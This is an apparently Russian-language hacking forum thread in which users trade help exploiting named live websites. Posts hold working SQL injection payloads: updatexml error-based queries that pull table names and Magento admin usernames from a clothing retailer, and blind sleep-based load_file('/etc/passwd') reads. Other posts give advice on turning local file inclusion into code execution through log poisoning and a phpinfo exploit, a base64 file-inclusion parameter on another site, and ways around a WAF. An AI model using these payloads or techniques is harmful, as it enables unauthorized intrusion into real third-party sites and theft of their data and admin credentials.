как минимум нужен инклуд, да. все остальное стандартно, пытайтесь записать ваш код в еррор логи, ацес логи, логи авторизации http://itix.pp.ua/2013/01/06/безопа...local-file-include-и-rfi-remote-file-include/ у вас lfi?
Ребяяяяяяят, подскажите, можно тут как-то раскрутить? Ни разу не раскручивала подобного рода Code: http://photo{REMOVE}vogue.arta{REMOVE}ndcommerce.com/res{REMOVE}ults.php?type=search&search=fashion+or+beauty'&sortby=dtc&page=2
из запроса вырезаются кавычки, но перед этим экранируются - поэтому и появляется ошибка. однако внедирть ничего после кавычки не вышло
Да, LFI акксесс логи обновляются каждый раз при заходе с 1 компа на любую веб страницу сайта + картинки, логи как минимум от 100мб и наврятли подлежат адекватному инклуду Еррор логи я думаю меньше намного и иклудить стоит именно их. А где логи авторизации хранятся?
http://www.lanmaster53.com/2011/05/local-file-inclusion-to-remote-command-execution-using-ssh/ посмотрите еще соседей, возможно получится проинклудить что-нибудь у них. в error_log, обычно, пишется refferer совсем забыл: https://rdot.org/forum/showthread.php?t=1134
Первая статья кул! Со второй статьей не понял. Идет речь о замедленной передаче $_FILES в temp директорию? Что за файл /tmp/lastline?
оттуда вам нужен только сплойт. https://rdot.org/forum/showpost.php?p=18024&postcount=11 указываете путь до phpinfo, /etc/passwd и запускаете
помогите люди добрые. слепая: PHP: 'or(if(load_file('/etc/passwd') is not NULL,sleep(1),0))or' PHP: 'or(if(ascii(substring((load_file('/etc/passwd')),461))>=117,sleep(1),0))or' фильтрации нет, пролазит всё, обрезать or' не могу с заливкой борода: PHP: 'or(select 1 into outfile '/tmp/1.txt')or' не дает результата есть варианты залится?
Code: https://www.childsplayclothing.co.uk/designers/pr'*updatexml(1,concat(0x3A,(select+database())),1)*' Помогите составить запрос, чтоб вытащить имена таблиц. Непонятно что фильтруется. Code: https://www.childsplayclothing.co.uk/designers/pr'*updatexml(1,concat(0x3A,(select+table_name+from+infromation_schema.tables+limit+0,1)),1)*' результата не дает.
Code: https://www.childsplayclothing.co.uk/designers/pr'*updatexml(1,concat(0x3A,(select(group_concat(table_name))from(information_schema.tables))),1)*' дайте ссылку глянуть
нужный запрос: Code: https://www.childsplayclothing.co.uk/designers/pr'*updatexml(1,concat(0x3A,(select(mid(group_concat(username),1,1032))from(magento_admin_user))),1)*' WAF запрещает последовательные записи в url строке select и admin_user как я понял Помогите выполнить запрос
Code: http://www.isoimagesuk.com/pixaria.thumbnail.php?file=L25mcy9jMDkvaDA1L21udC8xMzI0MzYvZG9tYWlucy9pc29pbWFnZXN1ay5jb20vaHRtbC9yZXNvdXJjZXMvbGlicmFyeS8yMDE0LTA0LTE4LzgweDgwL0lTT19FWENBTExST1VORF9FQVNURU5ERVJTU1BPSUxFUl9MVUNZX0dSQVZFU0lERTg2NS5qcGc= вроде как LFI. ну по сути file=... в base64 абсолютный путь Но не знаю как раскрутить короче. не очень стандартно тут. Есть идеи?
Ребят,я вот понять не могу. Nikto говорит,что можно заюзать уязвимость,отправляя спец. запрос,аля: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 (php-credits) /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 (http://s018.radikal.ru/i512/1504/73/b71e3ddc27cb.gif ) /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42 (php) /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42 (zend engine 2) Где об этом можно почитать? И что из этого можно получить? P/S. так же есть PMA (3.4.11.1) и SquirrelMail (version 1.4.23 [SVN]). Буду благодарен за любую помощь! (PHP Version 5.4.36-0+deb7u3 This program makes use of the Zend Scripting Language Engine: Zend Engine v2.4.0, Copyright (c) 1998-2014 Zend Technologies )
"Сразу хочется подчеркнуть, что пасхальные яйца PHP, о которых пойдёт речь, абсолютно безобидны" =(((
/setup/ = Невозможно загрузить или сохранить настройки (т.к. нет каталога config) тоже странно...Юзеры же есть на сайте + инфа явно из бд чекается
простите, что дублирую, у кого-нибудь есть идеи? или тут макс. что проверка на возможность чтения файла?